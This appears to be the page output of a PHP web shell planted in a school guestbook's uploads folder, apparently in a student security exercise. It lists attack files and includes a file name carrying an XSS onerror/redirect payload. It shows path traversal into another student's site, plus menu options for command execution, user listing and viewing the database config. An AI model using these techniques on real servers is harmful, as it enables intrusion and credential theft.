🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ../../../../584752.klas4s23.mid-ica.nl/public_html/card game/game.css

body {
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f0f0f0;
}

header{
    font-size: x-large;
}

.scoreboard1 {
    border: 2px solid;
    z-index: 1;
    margin-top: 20px;
    border-radius: 5px;
    
}

#game {
    text-align: center;
}

.card-container {
    position: relative;
    display: flex;
    justify-content: center;
    margin-bottom: 20px;
}

.card {
    width: 100px;
    /* height: 150px; */
    border: 1px solid #000;
    border-radius: 10px;
    display: flex;
    justify-content: center;
    flex-direction: column;
    align-items: center;
    font-size: 2em;
    background-color: #fff;
    margin: 0 10px;
    box-shadow: 0 4px 8px rgba(0, 0, 0, 0.2);
}

.imagecard {
    position: absolute;
    height: 100%;
    display: none;
    background-image: url('J-C.png');
    background-size: 90%;
    background-repeat: no-repeat;
    background-position: center;
}



#currentCard {
    background-color: #fff;
}

#nextCard {
    background-color: #fff;
}

.container {

    display: grid;
    height: 100%;
    width: 100px;
    grid-template-columns: 0.5fr 1fr 1fr 1fr 0.5fr;
    grid-template-rows: 20px 1fr 1fr 1fr 1fr 1fr 1fr 1fr 20px;
    gap: 0px 0px;
    grid-auto-flow: row;
    grid-template-areas:
        "tl st st st tr"
        "sl s1 s2 s3 sr"
        "sl s4 s5 s6 sr"
        "sl s7 s8 s9 sr"
        "sl s10 s11 s12 sr"
        "sl s13 s14 s15 sr"
        "sl s16 s17 s18 sr"
        "sl s19 s20 s21 sr"
        "bl sb sb sb br";
}

.tl {
    grid-area: tl;
}

.tr {
    grid-area: tr;
}

.st {
    grid-area: st;
}

.bl {
    grid-area: bl;
}

.br {
    grid-area: br;
    align-self: end;
}

.sb {
    grid-area: sb;
}

.sl {
    grid-area: sl;
}

.sr {
    grid-area: sr;
}

.s1 {
    grid-area: s1;
    font-size: 0.5em;
}

.s2 {
    grid-area: s2;
    font-size: 0.5em;
}

.s3 {
    grid-area: s3;
    font-size: 0.5em;
}

.s4 {
    grid-area: s4;
    font-size: 0.5em;
}

.s5 {
    grid-area: s5;
    font-size: 0.5em;
}

.s6 {
    grid-area: s6;
    font-size: 0.5em;
}

.s7 {
    grid-area: s7;
    font-size: 0.5em;
}

.s8 {
    grid-area: s8;
    font-size: 0.5em;
}

.s9 {
    grid-area: s9;
    font-size: 0.5em;
}

.s10 {
    grid-area: s10;
    font-size: 0.5em;
}

.s11 {
    grid-area: s11;
    font-size: 0.5em;
}

.s12 {
    grid-area: s12;
    font-size: 0.5em;
}

.s13 {
    grid-area: s13;
    font-size: 0.5em;
}

.s14 {
    grid-area: s14;
    font-size: 0.5em;
}

.s15 {
    grid-area: s15;
    font-size: 0.5em;
}

.s16 {
    grid-area: s16;
    font-size: 0.5em;
}

.s17 {
    grid-area: s17;
    font-size: 0.5em;
}

.s18 {
    grid-area: s18;
    font-size: 0.5em;
}

.s19 {
    grid-area: s19;
    font-size: 0.5em;
}

.s20 {
    grid-area: s20;
    font-size: 0.5em;
}

.s21 {
    grid-area: s21;
    font-size: 0.5em;
}

.corner {
    font-size: 0.5em;
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!